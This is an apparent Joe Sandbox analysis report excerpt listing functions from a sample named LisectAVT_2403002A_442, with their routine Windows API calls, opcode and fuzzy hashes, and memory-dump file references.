Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8254e39e523855b00924653c2a81f2f2f441416ece46ccb1c6833e6322688acf
Instruction ID: c2c45bd0f2580135409f30d89024406fe9c4249bb671ae03ad1e68b90659537a
Opcode Fuzzy Hash: 8254e39e523855b00924653c2a81f2f2f441416ece46ccb1c6833e6322688acf
Instruction Fuzzy Hash: B9E0E531640621DAEBB136699C04B9A77CC9B913B0F554310BCD4A60C0CF6CDC2185EB

Function 006E96D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,006E968F,?,?,?,?,00711FA1,000000FF), ref: 006E96EB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8cdd7fbc7b8a38e8b1bdc35783e2fba1cb39515a57079698e7b050765a63aa89
Instruction ID: 34be530a81ea56cb0eaff133e1362d1b1d14b6e8ba5ad3b6115636d97a70a1e4
Opcode Fuzzy Hash: 8cdd7fbc7b8a38e8b1bdc35783e2fba1cb39515a57079698e7b050765a63aa89
Instruction Fuzzy Hash: 55F0BE30087B809FEB308E26D5587D2B7E59F12329F088B1E90F703AE0D764A94D8B20

Function 006EA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 006EA4F5

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c6df30db820b5f1fb813f3e8eb4367c5039c55282beb310d31a77b923e5b545c
Instruction ID: a41eab4c0ea791d36c7da1d2865f61b3bcf3d10c251049be854f18f58ae48fb0
Opcode Fuzzy Hash: c6df30db820b5f1fb813f3e8eb4367c5039c55282beb310d31a77b923e5b545c
Instruction Fuzzy Hash: 37F0B43500A3C0AACA625BF948047D67BE26F0A321F14CA4DF1F9021D2C27424859723

Function 006F067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 006F06B1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: c86abb3e6fd7e372e26006ff977abd688f389a50980714893df1b0c27ba317b3
Instruction ID: 16521d29d13be0cd07c19a9957374fe9f4a66b14e08e12c65e67bf23732c6fe6
Opcode Fuzzy Hash: c86abb3e6fd7e372e26006ff977abd688f389a50980714893df1b0c27ba317b3
Instruction Fuzzy Hash: F7D02B2130516465D6613329E8067FE1E070FC3790F0C0029B20D576D7CB4B088643FA

Function 006F9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 006F9D81

Part of subcall function 006F9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 006F9B30

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 83ad844e34e251c714bfe87f655f2b4283a9541ebeab93062c828cc1f4bc68e3
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: E0D0C73065860D7ADF81BAB59C12B7A7BAADF00350F104169BE0886251FD72DE10A675

Function 006E9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,006E9887), ref: 006E9995

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ef3703686439b5c0d9a9020eb7d0e4a6f481ada1dfbeb437e772c9807d9e0be9
Instruction ID: aff47046fdca29718cf9b6e8f0ab8bb50c31050b99acd7c5ca5056bb75cd9e85
Opcode Fuzzy Hash: ef3703686439b5c0d9a9020eb7d0e4a6f481ada1dfbeb437e772c9807d9e0be9
Instruction Fuzzy Hash: 8CD012314123C0998F21463A4D090D97753DF83366B3CC6A8D035C41A2D72BC803F551

Function 006FD41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 006FD43F

Part of subcall function 006FAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006FAC85
Part of subcall function 006FAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006FAC96
Part of subcall function 006FAC74: IsDialogMessageW.USER32(0001042E,?), ref: 006FACAA
Part of subcall function 006FAC74: TranslateMessage.USER32(?), ref: 006FACB8
Part of subcall function 006FAC74: DispatchMessageW.USER32(?), ref: 006FACC2

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 297b5ccfba02266f64cd3f5bdd6fc8b1878f07f69b484d2baf824f4f5d675f64
Instruction ID: 9869e1483402b723bbbd5f7b5bd73d0bd116773f398b3d51a4b7a025a3aadf55
Opcode Fuzzy Hash: 297b5ccfba02266f64cd3f5bdd6fc8b1878f07f69b484d2baf824f4f5d675f64
Instruction Fuzzy Hash: 80D09E71144340ABD6512B51CE06F1F7AA6AB98B04F404658B348740B28666AD319B1A

Function 006FE1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FE20B

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8fa7eca523f2951b73ffede2e8ac8b6717b2e03234e440620de4120054d328ad
Instruction ID: fdbbb97042d6a8e8cbc7cf6f2d696b5af6b1f34f1050dbbdb313a74937be884d
Opcode Fuzzy Hash: 8fa7eca523f2951b73ffede2e8ac8b6717b2e03234e440620de4120054d328ad
Instruction Fuzzy Hash: 1BB012D126F0057D330C11587E16D76031EC4C0F50330C02EB305D40D1A7455D4B4032

Function 006FDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ef6d05dd37d0a4ae63ce9aaa41136a83aa4dbf97d66491a607e9db2b40f2c51
Instruction ID: 905b1c3bb0138705819aa8460883d2b60d1c21cbbb54e557c1d2c9b4434c7f7f
Opcode Fuzzy Hash: 5ef6d05dd37d0a4ae63ce9aaa41136a83aa4dbf97d66491a607e9db2b40f2c51
Instruction Fuzzy Hash: 24B012E13AD005EC324C714DBC02E3A028FC4C0B10330C22FB509D0095E64C6C474435

Function 006FDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1d07e696a8867a01247a6c982a4e21215f8ed219a235e9ac7d3cccb42b62d863
Instruction ID: 0a98d7c53ae009c37f710e6ebb06c9abb902e61c530b4c0c64bca85fa933e9f8
Opcode Fuzzy Hash: 1d07e696a8867a01247a6c982a4e21215f8ed219a235e9ac7d3cccb42b62d863
Instruction Fuzzy Hash: 8CB012D136D005AC324CB14DBC02F3E028FC0C4B10330C52FB209D0085E6486C8B4435

Function 006FDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDAB2

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7a1ebf5704690d738e94deed8253363e3dd4e3ea4586f38cfad8075705130e42
Instruction ID: 85f19411aa1c5cd2e3c30acc8f756ef1334a4bb86eed9bf34ee06d11fadb35d7
Opcode Fuzzy Hash: 7a1ebf5704690d738e94deed8253363e3dd4e3ea4586f38cfad8075705130e42
Instruction Fuzzy Hash: ECB012D13AD109AC324C714DBC02F3A028FD0C0B10330812FB109D0085E6486C474539

Function 006FDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e5f17e5a7710c769e066a434b253547e6f8b302e28733e56d9f0080d6725e02d
Instruction ID: 3fad70551da1bed41e39a4249ea8080ccb6c66e85dab6eb0e4874ce0c603d951
Opcode Fuzzy Hash: e5f17e5a7710c769e066a434b253547e6f8b302e28733e56d9f0080d6725e02d
Instruction Fuzzy Hash: 91B012E536D00AAC324C511C2C07E77036FC4C0B10330C02EB609C2081DF446C4E4031

Function 006FDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a489995b12fb30237e4d1e723b687ccb8331c0ff8c6982560b15835c37aa653
Instruction ID: e1327b0161c714a534707e3314766fadd438b65523776d8e2f60ea16c09d03b8
Opcode Fuzzy Hash: 4a489995b12fb30237e4d1e723b687ccb8331c0ff8c6982560b15835c37aa653
Instruction Fuzzy Hash: A6B012E536D00A6C334C511C2D07E77035FC0C0B10330C02EB309C1081DF446C4B4031

Function 006FDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6d03c56bc1b36757e700f42a8a3d280ba45716c48230ff4e9ba66ba25084d33
Instruction ID: 3e55f3d4fab8e25e4ee320161b217307556f309550532d22875e66e6ef4976e5
Opcode Fuzzy Hash: e6d03c56bc1b36757e700f42a8a3d280ba45716c48230ff4e9ba66ba25084d33
Instruction Fuzzy Hash: 3FB012E537D10E7C334811182C07D77031FC0C0B10330813EB205D00819F446C8E4031

Function 006FDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDBD5

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd012d9cde5bf9263c006ebc3c31b875cf0af416d476aecb9f921a8805db0a33
Instruction ID: 0d1fdd692d464d64ec91ff76a824e45d43002b0f35afc8c427644ba91dbdff39
Opcode Fuzzy Hash: bd012d9cde5bf9263c006ebc3c31b875cf0af416d476aecb9f921a8805db0a33
Instruction Fuzzy Hash: B6B012E536D0096C3248512C2C07F76035FD0C0B10330803EB20AC1081DB446C4E4031

Function 006FDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDC36

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24b42c1a40c03de736606aafb72ff2da1eb53c619d2e61f1f77b647b93a7521a
Instruction ID: 648e9a044c1037510a77a4be89d9f2a92bbf78c54e5ff1656fa23004ea545f1f
Opcode Fuzzy Hash: 24b42c1a40c03de736606aafb72ff2da1eb53c619d2e61f1f77b647b93a7521a
Instruction Fuzzy Hash: 8FB012D527D2096C324C714C6C02E76022FC0C4B11730852FB309D0081D7847C4A4035

Function 006FDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDC36

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c5b891501f11f098c493daa4876c4c9e3901538b9a3ac5655ecc5a14d00df006
Instruction ID: c11586298f824baa82295155e7af89b75c18254d0cdab20bf9b44c89c21973f1
Opcode Fuzzy Hash: c5b891501f11f098c493daa4876c4c9e3901538b9a3ac5655ecc5a14d00df006
Instruction Fuzzy Hash: 0EB012D526D1096C324C710C6C02E76022FC4C8B11730C52EB709D0081D7847C4A4035

Function 006FDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FDC36

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

